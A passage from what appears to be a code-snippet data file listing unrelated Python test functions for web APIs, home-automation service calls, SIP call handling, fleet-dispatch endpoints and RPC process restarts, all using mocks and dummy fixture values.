test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def test_services_endpoint(self):\n with open('demo/tests/mock_results.json', 'r') as result_file:\n data = result_file.read()\n expected_response = json.loads(data)[\"test_service_calls\"]\n\n responses.add(\n responses.GET,\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service',\n json=expected_response,\n status=200\n )\n resp = requests.get(\n f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service')\n\n assert resp.status_code == 200\n assert resp.json() == expected_response\n assert len(responses.calls) == 1\n expected_url = f'{os.environ[\"AIVEN_API_URL\"]}/v1/project/MY-PROJECT-NAME/service'\n assert responses.calls[0].request.url == expected_url\n assert \"MY-SERVICE-NAME\" in responses.calls[0].response.text\n assert responses.calls[0].response.json() == expected_response", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test():\n request = pb2.TestRequest.FromString(flask.request.get_data())\n logger.debug(\"Flask service received: %s\", request)\n\n if not request.service_hops:\n response = pb2.TestResponse(\n id=request.id,\n status=[pb2.CommonResponseStatus(\n status=pb2.SUCCESS,\n )],\n )\n else:\n status = ([pb2.CommonResponseStatus(status=pb2.SUCCESS)] +\n list(service.call_next(request).status))\n response = pb2.TestResponse(id=request.id, status=status)\n\n tracer = execution_context.get_opencensus_tracer()\n tracer.add_attribute_to_current_span(\"reqId\", request.id)\n return response.SerializeToString()", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "async def test_program_start_and_stop(\n aresponses: ResponsesMockServer,\n authenticated_local_client: ResponsesMockServer,\n program_start_stop_response: dict[str, Any],\n) -> None:\n async with authenticated_local_client:\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/start\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n authenticated_local_client.add(\n f\"{TEST_HOST}:{TEST_PORT}\",\n \"/api/4/program/1/stop\",\n \"post\",\n response=aiohttp.web_response.json_response(\n program_start_stop_response, status=200\n ),\n )\n\n async with aiohttp.ClientSession() as session:\n client = Client(session=session)\n await client.load_local(\n TEST_HOST, TEST_PASSWORD, port=TEST_PORT, use_ssl=False\n )\n controller = next(iter(client.controllers.values()))\n\n data = await controller.programs.start(1)\n assert data[\"message\"] == \"OK\"\n\n data = await controller.programs.stop(1)\n assert data[\"message\"] == \"OK\"\n\n aresponses.assert_plan_strictly_followed()", "def test_multiple_segments(self):\n socket = Mock()\n data = service_call.encode_call('bar', [10])\n socket.recv = Mock()\n socket.recv.side_effect = [data[:3], data[3:]]\n\n service_call.handle_connection(self.handlers, socket)\n self.handlers['bar'].assert_any_call([10])", "async def test_service_calls(oppio_env, opp, aioclient_mock):\n assert await async_setup_component(opp, \"oppio\", {})\n\n aioclient_mock.post(\"http://127.0.0.1/addons/test/start\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stop\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/restart\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/update\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/addons/test/stdin\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/shutdown\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/host/reboot\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/full\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/snapshots/new/partial\", json={\"result\": \"ok\"})\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/full\", json={\"result\": \"ok\"}\n )\n aioclient_mock.post(\n \"http://127.0.0.1/snapshots/test/restore/partial\", json={\"result\": \"ok\"}\n )\n\n await opp.services.async_call(\"oppio\", \"addon_start\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_stop\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_restart\", {\"addon\": \"test\"})\n await opp.services.async_call(\"oppio\", \"addon_update\", {\"addon\": \"test\"})\n await opp.services.async_call(\n \"oppio\", \"addon_stdin\", {\"addon\": \"test\", \"input\": \"test\"}\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 8\n assert aioclient_mock.mock_calls[-1][2] == \"test\"\n\n await opp.services.async_call(\"oppio\", \"host_shutdown\", {})\n await opp.services.async_call(\"oppio\", \"host_reboot\", {})\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 10\n\n await opp.services.async_call(\"oppio\", \"snapshot_full\", {})\n await opp.services.async_call(\n \"oppio\",\n \"snapshot_partial\",\n {\"addons\": [\"test\"], \"folders\": [\"ssl\"], \"password\": \"123456\"},\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 12\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n }\n\n await opp.services.async_call(\"oppio\", \"restore_full\", {\"snapshot\": \"test\"})\n await opp.services.async_call(\n \"oppio\",\n \"restore_partial\",\n {\n \"snapshot\": \"test\",\n \"openpeerpower\": False,\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"password\": \"123456\",\n },\n )\n await opp.async_block_till_done()\n\n assert aioclient_mock.call_count == 14\n assert aioclient_mock.mock_calls[-1][2] == {\n \"addons\": [\"test\"],\n \"folders\": [\"ssl\"],\n \"openpeerpower\": False,\n \"password\": \"123456\",\n }", "async def test_api_call_service_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\n\n Also test if our data came through.\n \"\"\"\n hass.states.async_set(\n \"test.data\",\n \"on\",\n {\"data\": service_call.data[\"test\"]},\n context=service_call.context,\n )\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"test\": 1}\n )\n data = await resp.json()\n assert len(data) == 1\n state = data[0]\n assert state[\"entity_id\"] == \"test.data\"\n assert state[\"state\"] == \"on\"\n assert state[\"attributes\"] == {\"data\": 1}", "def testPostEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Register an importer\n importer = ImportListener()\n context.register_service(pelix.remote.SERVICE_IMPORT_ENDPOINT_LISTENER,\n importer,\n {pelix.remote.PROP_REMOTE_CONFIGS_SUPPORTED:\n exporter.configs[0]})\n\n # Register a service\n context.register_service(\"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Get its representation\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n self.assertEqual(status, 200)\n\n # Change its UID and framework UID\n endpoint_data = json.loads(response)\n endpoint_data['uid'] = 'other-uid'\n endpoint_data['name'] = 'other-name'\n endpoint_data['sender'] = 'other-framework'\n\n # Send the 'discovered' event\n status, response = self._http_post(\"endpoints\",\n json.dumps([endpoint_data]))\n self.assertEqual(status, 200)\n self.assertEqual(response, 'OK')\n\n # Ensure that the service has been registered\n imported_endpoint = importer.endpoints[endpoint_data['uid']]\n self.assertEqual(imported_endpoint.uid, endpoint_data['uid'])\n self.assertEqual(imported_endpoint.framework, endpoint_data['sender'])\n self.assertEqual(imported_endpoint.name, endpoint_data['name'])", "def test_call(self):\n with HTTMock(spark_cloud_mock):\n for f in self.device.functions:\n expected = self.cloud_device.call(f, 'args')\n self.assertEqual(self.device.call(f, 'args'), expected)", "async def test_api_call_service_no_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n await mock_api_client.post(\"/api/services/test_domain/test_service\")\n await hass.async_block_till_done()\n assert len(test_value) == 1", "def test_gwservice_updatedevice(self, setup_controller):\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n payload = {'serialNumber': 'DEADBEEF0011',\n 'owner': 'pytest'}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"PUT\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"GET\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create device verify\", body=body)\n if resp.status_code != 200:\n assert False\n\n device = json.loads(resp.text)\n print (device)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False\n\n @pytest.mark.sdk_restapi\n def test_gwservice_deletedevice(self, setup_controller):\n \"\"\"\n Test the delete device endpoint\n WIFI-3455\n \"\"\"\n configuration = {'uuid': '1'}\n payload = {'serialNumber': 'DEADBEEF0011',\n 'UUID': '123456',\n 'configuration': configuration,\n 'deviceType': 'AP',\n 'location': '',\n 'macAddress': 'DE:AD:BE:EF:00:11',\n 'manufacturer': 'Testing',\n 'owner': ''}\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"POST\", None, json.dumps(payload))\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw create devices\", body=body)\n if resp.status_code != 200:\n assert False\n devices = json.loads(resp.text)\n print (devices)\n\n\n resp = setup_controller.request(\"gw\", \"device/DEADBEEF0011\", \"DELETE\", None, None)\n body = resp.url + \",\" + str(resp.status_code) + ',' + resp.text\n allure.attach(name=\"gw get device\", body=body)\n if resp.status_code != 200:\n assert False", "def test_rpcCall(self):\n pass", "async def test_create_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_get_dispatch_route_history(client):\n params = [('access_token', 'access_token_example'),\n ('start_time', 56),\n ('end_time', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes/{route_id}/history'.format(route_id=56),\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_API(self):\n print(\"Test API ...\")\n t0 = time.time()\n c = 0\n for trip_headsign in TRIP_HEADSIGN:\n for stop in STOP_A:\n payload = {'format': 'json', 'route_id': \"A\", 'trip_headsign': trip_headsign, 'stop_name': stop}\n req = requests.get('https://applications002.brest-metropole.fr/WIPOD01/Transport/REST/getRemainingTimes',params=payload)\n if len(req.text) < 100 : #API answer 189 characters if it works well\n print(\"API not responding for parameters : {}, {} \".format(trip_headsign, stop))\n c += 1\n else :\n print(\"Params : {}, {} : {}\".format(trip_headsign, stop, req.text))\n duration = time.time() - t0\n print(\"END OF TEST : duration : {} s, {} requests failed\".format(duration, c))", "def test_restart_process(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_process(0, 'appli:*', 'arg list', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', 'arg list','wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_process(0, 'appli:*', '', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli:*', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertEqual(0, mocked_stop_job.call_count)\n self.assertEqual(0, mocked_start_job.call_count)\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # replace the stop job with a function telling that the job is completed\n mocked_stop_job.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli:*', '', 'wait')], mocked_start.call_args_list)\n self.assertEqual([call()], mocked_stop_job.call_args_list)\n self.assertEqual(0, mocked_start_job.call_count)\n mocked_stop_job.reset_mock()\n # call the deferred function again to check that the start is engaged\n self.assertFalse(deferred())\n self.assertEqual([call()], mocked_start_job.call_args_list)\n self.assertEqual(0, mocked_stop_job.call_count)", "def test_start_several_values(self):\n for ip in [\"1.1.1.1\", \"2.2.2.2\", \"3.3.3.3\"]:\n self.client.ensure_path(\"/services/db/%s\" % ip)\n self.client.set(\"/services/db/%s\" % ip,\n json.dumps({\"enabled\": \"1\",\n \"ip\": ip}))\n z = ZkFarmExporter(self.client, \"/services/db\", self.conf)\n z.loop(2, timeout=self.TIMEOUT)\n self.conf.write.assert_called_with({\"1.1.1.1\": {\"enabled\": \"1\", \"ip\": \"1.1.1.1\"},\n \"2.2.2.2\": {\"enabled\": \"1\", \"ip\": \"2.2.2.2\"},\n \"3.3.3.3\": {\"enabled\": \"1\", \"ip\": \"3.3.3.3\"}})", "def test_service_call(self, create_connection):\n create_connection.return_value = Mock()\n create_connection.return_value.recv = Mock(return_value=msgpack.packb(None))\n\n adress = ('127.0.0.1', 20001)\n method_name = 'foo'\n method_params = [12]\n\n expected_data = service_call.encode_call(method_name, method_params)\n\n service_call.call(adress, method_name, method_params)\n\n create_connection.assert_any_call(adress)\n create_connection.return_value.sendall.assert_any_call(expected_data)", "def test_get_run(self):\n pass", "def test_tick(requests_mock, test_operator):\n tick_url = (\"https://habitica.com/api/v3/tasks/{}/score/up\"\n \"\".format(\"963e2ced-fa22-4b18-a22b-c423764e26f3\"))\n test_operator.tick_task(\"Test habit\")\n\n assert len(requests_mock.request_history) == 2\n tick_request = requests_mock.request_history[1]\n assert tick_url in tick_request.url", "def test_get_next_to_arrive(self, mock_requests):\n\n r = services.get_next_to_arrive(self.a, self.b)\n params = {'req1': self.a, 'req2': self.b}\n\n self.assertTrue(\n mock.call.get(services.SEPTA_NEXTTOARRIVE_URL, params=params) in\n mock_requests.mock_calls)", "async def test_fetch_all_dispatch_routes(client):\n params = [('access_token', 'access_token_example'),\n ('group_id', 56),\n ('end_time', 56),\n ('duration', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_normal_operation(self, mocker):\n api = mocker.Mock(spec=TelemetryAPI)\n api.record_unique_keys.return_value = HttpResponse(200, '')\n\n unique_keys_tracker = UniqueKeysTracker()\n unique_keys_tracker.track(\"key1\", \"split1\")\n unique_keys_tracker.track(\"key2\", \"split1\")\n\n unique_keys_sync = UniqueKeysSynchronizer(mocker.Mock(), unique_keys_tracker)\n task = UniqueKeysSyncTask(unique_keys_sync.send_all, 1)\n task.start()\n time.sleep(2)\n assert task.is_running()\n assert api.record_unique_keys.mock_calls == mocker.call()\n stop_event = threading.Event()\n task.stop(stop_event)\n stop_event.wait(5)\n assert stop_event.is_set()", "def test_get_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"Get master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, name=\"master\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n\n print(\"Get all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_MULTI_INSTANCE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 8)\n self.assertEqual(int(response[5][\"instance_rib_irib_active_count\"]), 2)\n\n print(\"Get brief all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_BRIEF\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(int(response[0][\"instance_rib_irib_active_count\"]), 18)\n\n print(\"Get detail all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_DETAIL\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 2)\n self.assertEqual(response[0][\"router_id\"], \"10.208.133.147\")\n\n print(\"Get extensive all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertEqual(len(response), 18)\n self.assertEqual(response[17][\"instance_rib_irib_name\"], \"inet6color.0\")\n\n print(\"Get summary all instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins)\n print(self.tool.pprint(response))\n self.assertIsInstance(response, (list, tuple))\n self.assertGreaterEqual(len(response), 1)\n\n print(\"Get route instance info by text and more options\")\n mock_execute_cli_command_on_device.return_value = self.response[\"SA_INSTANCE_TEXT\"]\n response = self.ins.get_route_instance_entry(device=mock_device_ins, return_mode=\"text\", more_options=\"summary\")\n print(self.tool.pprint(response))\n self.assertIsInstance(response, str)\n self.assertRegex(response, r\"__juniper_private1__.inet.0\")\n\n print(\"Invalid return_mode value\")\n mock_execute_cli_command_on_device.return_value = self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"]\n self.assertRaisesRegex(\n ValueError,\n r\"'return_mode' must be 'ENTRY_LIST' or 'TEXT'\",\n self.ins.get_route_instance_entry,\n device=mock_device_ins, return_mode=\"Unknown\",\n )\n\n print(\"Cannot get response from device\")\n mock_execute_cli_command_on_device.return_value = False\n response = self.ins.get_route_instance_entry(device=mock_device_ins, more_options=\"summary\")\n self.assertFalse(response)", "async def test_list_fleet(client):\n group_param = {}\n params = [('access_token', 'access_token_example'),\n ('starting_after', 'starting_after_example'),\n ('ending_before', 'ending_before_example'),\n ('limit', 56)]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/list',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_get_fleet_trips(client):\n trips_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/trips',\n headers=headers,\n json=trips_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_1():\n\tassert api_call().status_code == 200", "async def test_create_vehicle_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/vehicles/{vehicle_id}/dispatch/routes'.format(vehicle_id=56),\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_action(\n hass: HomeAssistant,\n entity_registry: er.EntityRegistry,\n enable_custom_integrations: None,\n) -> None:\n entry = entity_registry.async_get_or_create(DOMAIN, \"test\", \"5678\")\n\n assert await async_setup_component(\n hass,\n automation.DOMAIN,\n {\n automation.DOMAIN: [\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_open\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"open\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_close\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"close\",\n },\n },\n {\n \"trigger\": {\"platform\": \"event\", \"event_type\": \"test_event_stop\"},\n \"action\": {\n \"domain\": DOMAIN,\n \"device_id\": \"abcdefgh\",\n \"entity_id\": entry.id,\n \"type\": \"stop\",\n },\n },\n ]\n },\n )\n await hass.async_block_till_done()\n\n open_calls = async_mock_service(hass, \"cover\", \"open_cover\")\n close_calls = async_mock_service(hass, \"cover\", \"close_cover\")\n stop_calls = async_mock_service(hass, \"cover\", \"stop_cover\")\n\n hass.bus.async_fire(\"test_event_open\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 0\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_close\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 0\n\n hass.bus.async_fire(\"test_event_stop\")\n await hass.async_block_till_done()\n assert len(open_calls) == 1\n assert len(close_calls) == 1\n assert len(stop_calls) == 1\n\n assert open_calls[0].domain == DOMAIN\n assert open_calls[0].service == \"open_cover\"\n assert open_calls[0].data == {\"entity_id\": entry.entity_id}\n assert close_calls[0].domain == DOMAIN\n assert close_calls[0].service == \"close_cover\"\n assert close_calls[0].data == {\"entity_id\": entry.entity_id}\n assert stop_calls[0].domain == DOMAIN\n assert stop_calls[0].service == \"stop_cover\"\n assert stop_calls[0].data == {\"entity_id\": entry.entity_id}", "def testApi(self):", "def test_restart_application(self, mocked_check, mocked_stop, mocked_start):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call with sub-RPC calls return a direct result\n mocked_stop.return_value = True\n mocked_start.return_value = False\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n mocked_check.reset_mock()\n # result is a function\n self.assertTrue(callable(deferred))\n self.assertTrue(deferred.waitstop)\n # test this function\n self.assertFalse(deferred())\n self.assertFalse(deferred.waitstop)\n self.assertEqual(0, mocked_stop.call_count)\n self.assertEqual([call(0, 'appli', 'wait')], mocked_start.call_args_list)\n mocked_start.reset_mock()\n # test RPC call with sub_RPC calls returning jobs\n # test with mocking functions telling that the jobs are not completed\n mocked_stop_job = Mock(return_value=False)\n mocked_start_job = Mock(return_value=False)\n mocked_stop.return_value = mocked_stop_job\n mocked_start.return_value = mocked_start_job\n deferred = rpc.restart_application(0, 'appli', 'wait')\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call('appli', True)], mocked_stop.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n mocked_stop.reset_mock()\n # result is a function for deferred result\n 